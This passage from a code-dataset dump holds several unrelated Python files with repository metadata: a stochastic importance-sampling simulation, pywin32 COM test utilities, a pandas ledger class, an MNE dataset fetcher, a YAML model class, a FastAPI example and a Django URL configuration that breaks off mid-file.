num_runs_per_core = int(num_runs/mp.cpu_count())
# Time how long the simulation runs take
start = timer()
# Using multiprocessing
def multi_processing_func(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs, queue_efolds,
queue_ws, queue_refs):
results =\
importance_sampling_simulations(x_in, x_r, x_end, t_in,
t_f, time_step, bias,
num_runs, drift, diffusion,
bias_type=bias_type,
count_refs=False)
fpt_values = np.array(results[0][:])
ws = np.array(results[1][:])
queue_efolds.put(fpt_values)
queue_ws.put(ws)
queue_efolds = Queue()
queue_ws = Queue()
queue_refs = Queue()
cores = int(mp.cpu_count()/1)
print('Number of cores used: '+str(cores))
processes = [Process(target=multi_processing_func,
args=(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs_per_core,
queue_efolds, queue_ws, queue_refs))
for i in range(cores)]
for p in processes:
p.start()
# More efficient to work with numpy arrays
fpt_array = np.array([queue_efolds.get() for p in processes])
ws_array = np.array([queue_ws.get() for p in processes])
end = timer()
print(f'The simulations took: {end - start} seconds')
# Combine into columns into 1
fpt_values = fpt_array.flatten()
w_values = ws_array.flatten()
# Sort in order of increasing Ns
sort_idx = np.argsort(fpt_values)
fpt_values = fpt_values[sort_idx]
w_values = w_values[sort_idx]
# Checking if multipprocessing error occured, by looking at correlation
_ = multi_processing_error(fpt_values, w_values)
# Truncating any data which did not reach x_end
fpt_values, w_values =\
histogram_data_truncation(fpt_values, t_f, weights=w_values,
num_sub_samples=num_sub_samples)
# Saving the data
if save_data is True:
if bias_type == 'diffusion':
save_data_to_file(fpt_values, w_values, x_in, num_runs, bias)
else:
# Label the file differently if custom bias is used.
save_data_to_file(fpt_values, w_values, x_in, num_runs,
bias(x_in, 0), extra_label='_custom_bias')
# Now analysisng the data to creating the histogram/PDF data
bin_centres, heights, errors, num_runs_used, bin_edges_untruncated =\
data_points_pdf(fpt_values, w_values, estimator, bins=bins,
min_bin_size=min_bin_size,
num_sub_samples=num_sub_samples)
# Return data as lists
return bin_centres.tolist(), heights.tolist(), errors.tolist()
| 40.876068 | 79 | 0.634919 |
from timeit import default_timer as timer
import multiprocessing as mp
from multiprocessing import Process, Queue
import numpy as np
from .multi_processing_error import multi_processing_error
from .histogram_data_truncation import histogram_data_truncation
from .save_data_to_file import save_data_to_file
from .data_points_pdf import data_points_pdf
from .importance_sampling_cython import\
importance_sampling_simulations
def is_simulation(drift, diffusion, x_in, x_end,
num_runs, bias, time_step, bins=50, min_bin_size=400,
num_sub_samples=20, estimator='lognormal',
save_data=False, t_in=0., t_f=100, x_r=None):
if callable(drift) is True:
if isinstance(drift(x_in, t_in), float) is True:
pass
else:
ValueError('Provided drift is not the format (x, t)')
else:
ValueError('Provided drift is not a function')
if callable(diffusion) is True:
if isinstance(diffusion(x_in, t_in), float) is True:
pass
else:
ValueError('Provided diffusion is not the format (x, t)')
else:
ValueError('Provided diffusion is not a function')
if isinstance(x_in, int) is True:
x_in = 1.0*x_in
if isinstance(x_end, int) is True:
x_end = 1.0*x_end
if isinstance(bias, float) is True or isinstance(bias, float) is True:
bias_type = 'diffusion'
if bias == 0:
estimator = 'naive'
print('As direct simulation, defaulting to naive estimator')
elif callable(bias):
if isinstance(bias(x_in, t_in), float) is True:
bias_type = 'custom'
else:
ValueError('bias function must be of the form bias(x, t)')
else:
ValueError('Provided bias is not a number or function')
if isinstance(time_step, float) is not True\
and isinstance(time_step, int) is not True:
raise ValueError('time_step is not a number')
if estimator != 'lognormal' and estimator != 'naive':
print('Invalid estimator argument, defaulting to naive method')
estimator = 'naive'
if x_r is None:
x_r = 10000*(x_in-x_end)
elif isinstance(x_r, float) is False:
if isinstance(x_r, int) is True:
if isinstance(x_r, bool) is True:
raise ValueError('x_r is not a number')
else:
pass
else:
raise ValueError('x_r is not a number')
elif (x_r-x_in)*(x_in-x_end) < 0:
raise ValueError('End and relfective surfaces not compatible with' +
' initial value.')
num_runs_per_core = int(num_runs/mp.cpu_count())
start = timer()
def multi_processing_func(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs, queue_efolds,
queue_ws, queue_refs):
results =\
importance_sampling_simulations(x_in, x_r, x_end, t_in,
t_f, time_step, bias,
num_runs, drift, diffusion,
bias_type=bias_type,
count_refs=False)
fpt_values = np.array(results[0][:])
ws = np.array(results[1][:])
queue_efolds.put(fpt_values)
queue_ws.put(ws)
queue_efolds = Queue()
queue_ws = Queue()
queue_refs = Queue()
cores = int(mp.cpu_count()/1)
print('Number of cores used: '+str(cores))
processes = [Process(target=multi_processing_func,
args=(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs_per_core,
queue_efolds, queue_ws, queue_refs))
for i in range(cores)]
for p in processes:
p.start()
fpt_array = np.array([queue_efolds.get() for p in processes])
ws_array = np.array([queue_ws.get() for p in processes])
end = timer()
print(f'The simulations took: {end - start} seconds')
fpt_values = fpt_array.flatten()
w_values = ws_array.flatten()
sort_idx = np.argsort(fpt_values)
fpt_values = fpt_values[sort_idx]
w_values = w_values[sort_idx]
_ = multi_processing_error(fpt_values, w_values)
fpt_values, w_values =\
histogram_data_truncation(fpt_values, t_f, weights=w_values,
num_sub_samples=num_sub_samples)
if save_data is True:
if bias_type == 'diffusion':
save_data_to_file(fpt_values, w_values, x_in, num_runs, bias)
else:
save_data_to_file(fpt_values, w_values, x_in, num_runs,
bias(x_in, 0), extra_label='_custom_bias')
bin_centres, heights, errors, num_runs_used, bin_edges_untruncated =\
data_points_pdf(fpt_values, w_values, estimator, bins=bins,
min_bin_size=min_bin_size,
num_sub_samples=num_sub_samples)
return bin_centres.tolist(), heights.tolist(), errors.tolist()
| true | true |
f7230f85330d992ee114b5f111b9c59920b93e24 | 8,008 | py | Python | Lib/site-packages/win32com/test/util.py | ekkipermana/robotframework-test | 243ca26f69962f8cf20cd7d054e0ff3e709bc7f4 | [
"bzip2-1.0.6"
] | 3 | 2020-06-18T16:57:44.000Z | 2020-07-21T17:52:06.000Z | com/win32com/test/util.py | huanyin88/Mod-Pywin32-For-Python3.x-DDE | 992931aa534357d54aaac34077f0128d3a740e5e | [
"Apache-2.0"
] | null | null | null | com/win32com/test/util.py | huanyin88/Mod-Pywin32-For-Python3.x-DDE | 992931aa534357d54aaac34077f0128d3a740e5e | [
"Apache-2.0"
] | null | null | null | import sys, os
import win32api
import tempfile
import unittest
import gc
import pywintypes
import pythoncom
import winerror
from pythoncom import _GetInterfaceCount, _GetGatewayCount
import win32com
import logging
import _winreg
import cStringIO as StringIO
import pywin32_testutil
from pywin32_testutil import TestLoader, TestResult, TestRunner, LeakTestCase
def CheckClean():
    # Warn if any COM interface or gateway objects created by the tests are
    # still alive - Python should have zero outstanding COM objects.
    # Ensure no lingering exceptions - Python should have zero outstanding
    # COM objects
    try:
        sys.exc_clear()
    except AttributeError:
        pass # py3k
    c = _GetInterfaceCount()
    if c:
        print "Warning - %d com interface objects still alive" % c
    c = _GetGatewayCount()
    if c:
        print "Warning - %d com gateway objects still alive" % c
def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server script `filename`, unless the given
    progids are already registered against this Python version.

    Raises a 'class not registered' com_error (rather than failing the
    registration command) when registration is needed but the current user
    lacks administrator rights.
    """
    if progids:
        if isinstance(progids, basestring):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        why_not = None
        for progid in progids:
            clsid = pywintypes.IID(progid)
            try:
                HKCR = _winreg.HKEY_CLASSES_ROOT
                hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
                dll = _winreg.QueryValue(hk, "InprocServer32")
            except WindowsError:
                # no CLSID or InProcServer32 - not registered
                break
            # Accept either the pythoncom DLL itself or the loader stub for
            # this exact Python version.
            ok_files = [os.path.basename(pythoncom.__file__),
                        'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            #print "Skipping registration of '%s' - already registered" % filename
            return
    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print "Can't import win32com.shell - no idea if you are an admin or not?"
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin.
            is_admin = True
    if not is_admin:
        msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
    # so theoretically we are able to register it.
    cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
    if verbose:
        print "Registering engine", filename
    # print cmd
    rc = os.system(cmd)
    if rc:
        print "Registration command was:"
        print cmd
        raise RuntimeError("Registration of engine '%s' failed" % filename)
def ExecuteShellCommand(cmd, testcase,
expected_output = None, # Set to '' to check for nothing
tracebacks_ok = 0, # OK if the output contains a t/b?
):
output_name = tempfile.mktemp('win32com_test')
cmd = cmd + ' > "%s" 2>&1' % output_name
rc = os.system(cmd)
output = open(output_name, "r").read().strip()
os.remove(output_name)
class Failed(Exception): pass
try:
if rc:
raise Failed("exit code was " + str(rc))
if expected_output is not None and output != expected_output:
raise Failed("Expected output %r (got %r)" % (expected_output, output))
if not tracebacks_ok and \
output.find("Traceback (most recent call last)")>=0:
raise Failed("traceback in program output")
return output
except Failed, why:
print "Failed to exec command '%r'" % cmd
print "Failed as", why
print "** start of program output **"
print output
print "** end of program output **"
testcase.fail("Executing '%s' failed as %s" % (cmd, why))
def assertRaisesCOM_HRESULT(testcase, hresult, func, *args, **kw):
try:
func(*args, **kw)
except pythoncom.com_error, details:
if details.hresult==hresult:
return
testcase.fail("Excepected COM exception with HRESULT 0x%x" % hresult)
class CaptureWriter:
    """Minimal file-like sink that records every write() call.

    capture() installs the instance as both sys.stdout and sys.stderr,
    remembering the previous streams; release() puts them back.  The
    captured text can then be inspected via get_captured().
    """
    def __init__(self):
        self.old_err = self.old_out = None
        self.clear()
    def capture(self):
        """Reset the buffer and redirect stdout/stderr to this object."""
        self.clear()
        self.old_out, self.old_err = sys.stdout, sys.stderr
        sys.stdout = sys.stderr = self
    def release(self):
        """Undo capture(): restore whichever streams were saved."""
        if self.old_out:
            sys.stdout, self.old_out = self.old_out, None
        if self.old_err:
            sys.stderr, self.old_err = self.old_err, None
    def clear(self):
        """Forget everything captured so far."""
        self.captured = []
    def write(self, msg):
        # Called by print and friends once installed via capture().
        self.captured.append(msg)
    def get_captured(self):
        """Return all captured text joined into one string."""
        return "".join(self.captured)
    def get_num_lines_captured(self):
        """Return the number of newline-separated lines captured."""
        return len(self.get_captured().split("\n"))
# Utilities to set the win32com logger to something what just captures
# records written and doesn't print them.
class LogHandler(logging.Handler):
    """logging.Handler that simply stores every emitted LogRecord.

    Tests read self.emitted to assert on what was logged, instead of
    parsing formatted output.
    """
    def __init__(self):
        logging.Handler.__init__(self)
        self.emitted = []
    def emit(self, record):
        # Keep the raw record object so callers can inspect level/msg/args.
        self.emitted.append(record)
_win32com_logger = None  # lazily-created singleton logger shared by all tests
def setup_test_logger():
    """Install a record-capturing logger as win32com.logger.

    Returns (emitted, old_log): `emitted` is the list that collects the
    LogRecord objects via LogHandler, and `old_log` is the previous value
    of win32com.logger (or None), for restore_test_logger().
    """
    old_log = getattr(win32com, "logger", None)
    global _win32com_logger
    if _win32com_logger is None:
        # First call: build the singleton logger with one capturing handler.
        _win32com_logger = logging.Logger('test')
        handler = LogHandler()
        _win32com_logger.addHandler(handler)
    win32com.logger = _win32com_logger
    handler = _win32com_logger.handlers[0]
    handler.emitted = []  # reset captured records for this test run
    return handler.emitted, old_log
def restore_test_logger(prev_logger):
    """Remove the test logger installed by setup_test_logger().

    Only prev_logger=None is supported (enforced by the assert), so the
    else branch restoring a previous logger is currently dead code.
    """
    assert prev_logger is None, "who needs this?"
    if prev_logger is None:
        del win32com.logger
    else:
        win32com.logger = prev_logger
# We used to override some of this (and may later!)
TestCase = unittest.TestCase  # alias so test modules can import TestCase from here
def CapturingFunctionTestCase(*args, **kw):
    """Build an output-capturing FunctionTestCase wrapped in a leak-checking case."""
    real_test = _CapturingFunctionTestCase(*args, **kw)
    return LeakTestCase(real_test)
class _CapturingFunctionTestCase(unittest.FunctionTestCase):#, TestCaseMixin):
    """FunctionTestCase that captures stdout/stderr while the test runs and
    records an error if the captured output contains a traceback."""
    def __call__(self, result=None):
        if result is None: result = self.defaultTestResult()
        writer = CaptureWriter()
        #self._preTest()
        writer.capture()
        try:
            unittest.FunctionTestCase.__call__(self, result)
            # Optional refcount-leak check; gettotalrefcount only exists on
            # debug builds of Python.  NOTE(review): run_leak_tests is not
            # defined in this class -- presumably provided by a wrapper or
            # mixin; confirm.
            if getattr(self, "do_leak_tests", 0) and hasattr(sys, "gettotalrefcount"):
                self.run_leak_tests(result)
        finally:
            # Always restore the real streams, even if the test blew up.
            writer.release()
        #self._postTest(result)
        output = writer.get_captured()
        self.checkOutput(output, result)
        if result.showAll:
            print output
    def checkOutput(self, output, result):
        """Record an error against this test if `output` contains a traceback."""
        if output.find("Traceback")>=0:
            msg = "Test output contained a traceback\n---\n%s\n---" % output
            result.errors.append((self, msg))
class ShellTestCase(unittest.TestCase):
def __init__(self, cmd, expected_output):
self.__cmd = cmd
self.__eo = expected_output
unittest.TestCase.__init__(self)
def runTest(self):
ExecuteShellCommand(self.__cmd, self, self.__eo)
def __str__(self):
max = 30
if len(self.__cmd)>max:
cmd_repr = self.__cmd[:max] + "..."
else:
cmd_repr = self.__cmd
return "exec: " + cmd_repr
def testmain(*args, **kw):
    """Run pywin32's test main, then warn about any leaked COM objects."""
    pywin32_testutil.testmain(*args, **kw)
    CheckClean()
| 35.433628 | 100 | 0.61988 | import sys, os
import win32api
import tempfile
import unittest
import gc
import pywintypes
import pythoncom
import winerror
from pythoncom import _GetInterfaceCount, _GetGatewayCount
import win32com
import logging
import _winreg
import cStringIO as StringIO
import pywin32_testutil
from pywin32_testutil import TestLoader, TestResult, TestRunner, LeakTestCase
def CheckClean():
try:
sys.exc_clear()
except AttributeError:
pass
c = _GetInterfaceCount()
if c:
print "Warning - %d com interface objects still alive" % c
c = _GetGatewayCount()
if c:
print "Warning - %d com gateway objects still alive" % c
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
why_not = None
for progid in progids:
clsid = pywintypes.IID(progid)
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
return
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
def ExecuteShellCommand(cmd, testcase,
expected_output = None,
tracebacks_ok = 0,
):
output_name = tempfile.mktemp('win32com_test')
cmd = cmd + ' > "%s" 2>&1' % output_name
rc = os.system(cmd)
output = open(output_name, "r").read().strip()
os.remove(output_name)
class Failed(Exception): pass
try:
if rc:
raise Failed("exit code was " + str(rc))
if expected_output is not None and output != expected_output:
raise Failed("Expected output %r (got %r)" % (expected_output, output))
if not tracebacks_ok and \
output.find("Traceback (most recent call last)")>=0:
raise Failed("traceback in program output")
return output
except Failed, why:
print "Failed to exec command '%r'" % cmd
print "Failed as", why
print "** start of program output **"
print output
print "** end of program output **"
testcase.fail("Executing '%s' failed as %s" % (cmd, why))
def assertRaisesCOM_HRESULT(testcase, hresult, func, *args, **kw):
try:
func(*args, **kw)
except pythoncom.com_error, details:
if details.hresult==hresult:
return
testcase.fail("Excepected COM exception with HRESULT 0x%x" % hresult)
class CaptureWriter:
def __init__(self):
self.old_err = self.old_out = None
self.clear()
def capture(self):
self.clear()
self.old_out = sys.stdout
self.old_err = sys.stderr
sys.stdout = sys.stderr = self
def release(self):
if self.old_out:
sys.stdout = self.old_out
self.old_out = None
if self.old_err:
sys.stderr = self.old_err
self.old_err = None
def clear(self):
self.captured = []
def write(self, msg):
self.captured.append(msg)
def get_captured(self):
return "".join(self.captured)
def get_num_lines_captured(self):
return len("".join(self.captured).split("\n"))
class LogHandler(logging.Handler):
def __init__(self):
self.emitted = []
logging.Handler.__init__(self)
def emit(self, record):
self.emitted.append(record)
_win32com_logger = None
def setup_test_logger():
old_log = getattr(win32com, "logger", None)
global _win32com_logger
if _win32com_logger is None:
_win32com_logger = logging.Logger('test')
handler = LogHandler()
_win32com_logger.addHandler(handler)
win32com.logger = _win32com_logger
handler = _win32com_logger.handlers[0]
handler.emitted = []
return handler.emitted, old_log
def restore_test_logger(prev_logger):
assert prev_logger is None, "who needs this?"
if prev_logger is None:
del win32com.logger
else:
win32com.logger = prev_logger
# We used to override some of this (and may later!)
TestCase = unittest.TestCase
def CapturingFunctionTestCase(*args, **kw):
real_test = _CapturingFunctionTestCase(*args, **kw)
return LeakTestCase(real_test)
class _CapturingFunctionTestCase(unittest.FunctionTestCase):#, TestCaseMixin):
def __call__(self, result=None):
if result is None: result = self.defaultTestResult()
writer = CaptureWriter()
#self._preTest()
writer.capture()
try:
unittest.FunctionTestCase.__call__(self, result)
if getattr(self, "do_leak_tests", 0) and hasattr(sys, "gettotalrefcount"):
self.run_leak_tests(result)
finally:
writer.release()
#self._postTest(result)
output = writer.get_captured()
self.checkOutput(output, result)
if result.showAll:
print output
def checkOutput(self, output, result):
if output.find("Traceback")>=0:
msg = "Test output contained a traceback\n---\n%s\n---" % output
result.errors.append((self, msg))
class ShellTestCase(unittest.TestCase):
def __init__(self, cmd, expected_output):
self.__cmd = cmd
self.__eo = expected_output
unittest.TestCase.__init__(self)
def runTest(self):
ExecuteShellCommand(self.__cmd, self, self.__eo)
def __str__(self):
max = 30
if len(self.__cmd)>max:
cmd_repr = self.__cmd[:max] + "..."
else:
cmd_repr = self.__cmd
return "exec: " + cmd_repr
def testmain(*args, **kw):
pywin32_testutil.testmain(*args, **kw)
CheckClean()
| false | true |
f72310316e69d5f9f95c4cfbe7fc3e21754a4391 | 1,029 | py | Python | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | null | null | null | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | 7 | 2021-06-30T12:05:47.000Z | 2021-07-14T07:50:27.000Z | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import List

import numpy as np
import pandas as pd
class Ledger(ABC):
    """Abstract interface for a transaction ledger: implementations must
    hand out sequential batch ids and transaction ids."""
    @abstractmethod
    def get_next_batch_id(self) -> int:
        """Return next available batch id."""
    @abstractmethod
    def get_next_transaction_id(self) -> int:
        """Return next available transaction id."""
class PandasLedger(Ledger):
    """Ledger implementation backed by a pandas DataFrame.

    Relies on the owner/subclass to provide ``self.df`` (the ledger table,
    with "batch_id" and "transaction_id" columns) and ``self.columns``
    (the columns persisted by :meth:`append`) -- neither is set here.
    """
    def get_next_batch_id(self) -> int:
        """Return the next free batch id (0 for an empty ledger)."""
        try:
            next_id = int(self.df["batch_id"].max()) + 1
        except ValueError:
            # max() of an empty column is NaN, and int(NaN) raises ValueError.
            return 0
        return next_id
    def append(self, df) -> List[int]:
        """Append ``df``'s rows to the ledger with fresh transaction ids.

        Mutates the caller's frame by adding a "transaction_id" column, then
        appends the configured columns to ``self.df``.  Returns the list of
        ids that were assigned.
        """
        next_id = self.get_next_transaction_id()
        ids = np.arange(start=next_id, stop=next_id + df.shape[0])
        df["transaction_id"] = ids
        # Fix: DataFrame.append() was deprecated in pandas 1.4 and removed in
        # pandas 2.0; pd.concat() is the supported, behavior-equivalent
        # replacement.
        self.df = pd.concat([self.df, df[self.columns]],
                            ignore_index=True, sort=False)
        return list(ids)
    def get_next_transaction_id(self) -> int:
        """Return the next free transaction id (0 for an empty ledger)."""
        try:
            next_id = int(self.df["transaction_id"].max()) + 1
        except ValueError:
            # Empty ledger: start numbering at 0.
            return 0
        return next_id
| 27.078947 | 81 | 0.616132 | from abc import ABC, abstractmethod
from typing import List
import numpy as np
class Ledger(ABC):
@abstractmethod
def get_next_batch_id(self) -> int:
@abstractmethod
def get_next_transaction_id(self) -> int:
class PandasLedger(Ledger):
def get_next_batch_id(self) -> int:
try:
next_id = int(self.df["batch_id"].max()) + 1
except ValueError:
return 0
return next_id
def append(self, df) -> List[int]:
next_id = self.get_next_transaction_id()
ids = np.arange(start=next_id, stop=next_id + df.shape[0])
df["transaction_id"] = ids
self.df = self.df.append(df[self.columns], ignore_index=True, sort=False)
return list(ids)
def get_next_transaction_id(self) -> int:
try:
next_id = int(self.df["transaction_id"].max()) + 1
except ValueError:
return 0
return next_id
| true | true |
f72310a1ea315b6aa985cf62ca1415bc2658bfc2 | 1,843 | py | Python | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 3 | 2021-01-04T08:45:56.000Z | 2021-05-19T12:25:59.000Z | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 28 | 2020-05-07T00:58:34.000Z | 2020-08-29T23:02:17.000Z | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T13:48:00.000Z | 2019-07-10T16:02:11.000Z | # License: BSD Style.
from ...utils import verbose
from ..utils import _data_path, _get_version, _version_doc
@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
              verbose=None):
    """
    Get path to local copy of the kiloword dataset.
    This is the dataset from [1]_.
    Parameters
    ----------
    path : None | str
        Location of where to look for the kiloword data storing
        location. If None, the environment variable or config parameter
        MNE_DATASETS_KILOWORD_PATH is used. If it doesn't exist,
        the "mne-python/examples" directory is used. If the
        kiloword dataset is not found under the given path (e.g.,
        as "mne-python/examples/MNE-kiloword-data"), the data
        will be automatically downloaded to the specified folder.
    force_update : bool
        Force update of the dataset even if a local copy exists.
    update_path : bool | None
        If True, set the MNE_DATASETS_KILOWORD_PATH in mne-python
        config to the given path. If None, the user is prompted.
    download : bool
        If False, do not fetch the dataset when it is missing locally
        (forwarded to the dataset fetcher -- presumably the expected
        path is still returned; confirm against ``_data_path``).
    %(verbose)s
    Returns
    -------
    path : list of str
        Local path to the given data file. This path is contained inside a list
        of length one, for compatibility.
    References
    ----------
    .. [1] Dufau, S., Grainger, J., Midgley, KJ., Holcomb, PJ. A thousand
       words are worth a picture: Snapshots of printed-word processing in an
       event-related potential megastudy. Psychological science, 2015
    """
    return _data_path(path=path, force_update=force_update,
                      update_path=update_path, name='kiloword',
                      download=download)
def get_version():
    """Get dataset version."""
    return _get_version('kiloword')
# The stub docstring above is replaced at import time by the project's
# shared version-doc template, rendered for the kiloword dataset.
get_version.__doc__ = _version_doc.format(name='kiloword')
| 33.509091 | 79 | 0.661964 |
from ...utils import verbose
from ..utils import _data_path, _get_version, _version_doc
@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
verbose=None):
return _data_path(path=path, force_update=force_update,
update_path=update_path, name='kiloword',
download=download)
def get_version():
return _get_version('kiloword')
get_version.__doc__ = _version_doc.format(name='kiloword')
| true | true |
f723117022eb914a0585fd58463edf8df6b3fddf | 653 | py | Python | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | import yaml
class ServiceArea(yaml.YAMLObject):
    """YAML-serializable record describing one robot service area.

    Registering yaml_tag/yaml_loader lets PyYAML's safe_load construct
    instances directly from ``!ServiceArea``-tagged documents.
    """
    yaml_loader = yaml.SafeLoader  # allow yaml.safe_load() to build this type
    yaml_tag = u'!ServiceArea'
    def __init__(self, area_type, area_name, instance_id, description, orientation_id = None, orientation_name = None, position = None, orientation = None):
        # NOTE(review): position/orientation look like pose data (point +
        # quaternion?) -- confirm the expected types with the callers.
        self.area_type = area_type
        self.area_name = area_name
        self.instance_id = instance_id
        self.description = description
        self.orientation_id = orientation_id
        self.orientation_name = orientation_name
        self.position = position
        self.orientation = orientation
| 40.8125 | 156 | 0.635528 | import yaml
class ServiceArea(yaml.YAMLObject):
yaml_loader = yaml.SafeLoader
yaml_tag = u'!ServiceArea'
def __init__(self, area_type, area_name, instance_id, description, orientation_id = None, orientation_name = None, position = None, orientation = None):
self.area_type = area_type
self.area_name = area_name
self.instance_id = instance_id
self.description = description
self.orientation_id = orientation_id
self.orientation_name = orientation_name
self.position = position
self.orientation = orientation
| true | true |
f723119ca64212a227a145c49f797065bce9bf36 | 379 | py | Python | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 41 | 2021-07-15T14:54:16.000Z | 2022-03-26T10:59:40.000Z | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 29 | 2021-08-04T08:04:26.000Z | 2021-08-19T09:50:30.000Z | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 3 | 2021-07-23T14:56:40.000Z | 2022-03-24T16:09:55.000Z | from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get('/')
def main():
return 'root url'
@app.get('/json')
def json():
return {
"result": "json",
"sub_result": {"sub": "json"}
}
class Request(BaseModel):
id: int
body: str
@app.post('/post')
def post(request: Request):
return request
| 13.535714 | 41 | 0.567282 | from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get('/')
def main():
return 'root url'
@app.get('/json')
def json():
return {
"result": "json",
"sub_result": {"sub": "json"}
}
class Request(BaseModel):
id: int
body: str
@app.post('/post')
def post(request: Request):
return request
| true | true |
f72311e46251fe6bd12e2879f883751994698f50 | 6,895 | py | Python | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | from django.urls import path
from adminpanel.views import (index,
WordCreateView, WordListView, WordUpdateView, WordDeleteView,
GrammarCreateView, GrammarListView, GrammarUpdateView, GrammarDeleteView,
LangCreateView, LangListView, LangUpdateView, LangDeleteView,
CourseCreateView, CourseUpdateView, CourseDeleteView,
TopicCreateView, TopicUpdateView, TopicDeleteView,
LessonCreateView, LessonUpdateView, LessonDeleteView,
TaskUpdateView,
task_update_with_ajax,
TaskType_1_UpdateView,
TaskType_2_UpdateView,
TaskType_3_UpdateView,
TaskType_4_UpdateView,
TaskType_5_UpdateView,
TaskType_6_UpdateView,
TaskType_7_UpdateView,
TaskType_8_UpdateView,
TaskType_9_UpdateView,
TaskType_10_UpdateView,
TaskType_11_UpdateView,
TaskType_12_UpdateView,
TaskType_13_UpdateView,
TaskType_14_UpdateView,
TaskType_15_UpdateView,
TaskType_16_UpdateView,
TaskType_17_UpdateView,
TaskType_18_UpdateView,
TaskType_19_UpdateView,
TaskType_20_UpdateView,
TaskType_21_UpdateView,
TaskType_22_UpdateView,
TaskType_23_UpdateView,
TaskDeleteView)
app_name = 'adminpanel'

# The 23 per-type task update views, in type order; used below to generate
# one URL pattern per type instead of 23 hand-written, near-identical entries.
_TASK_TYPE_UPDATE_VIEWS = (
    TaskType_1_UpdateView, TaskType_2_UpdateView, TaskType_3_UpdateView,
    TaskType_4_UpdateView, TaskType_5_UpdateView, TaskType_6_UpdateView,
    TaskType_7_UpdateView, TaskType_8_UpdateView, TaskType_9_UpdateView,
    TaskType_10_UpdateView, TaskType_11_UpdateView, TaskType_12_UpdateView,
    TaskType_13_UpdateView, TaskType_14_UpdateView, TaskType_15_UpdateView,
    TaskType_16_UpdateView, TaskType_17_UpdateView, TaskType_18_UpdateView,
    TaskType_19_UpdateView, TaskType_20_UpdateView, TaskType_21_UpdateView,
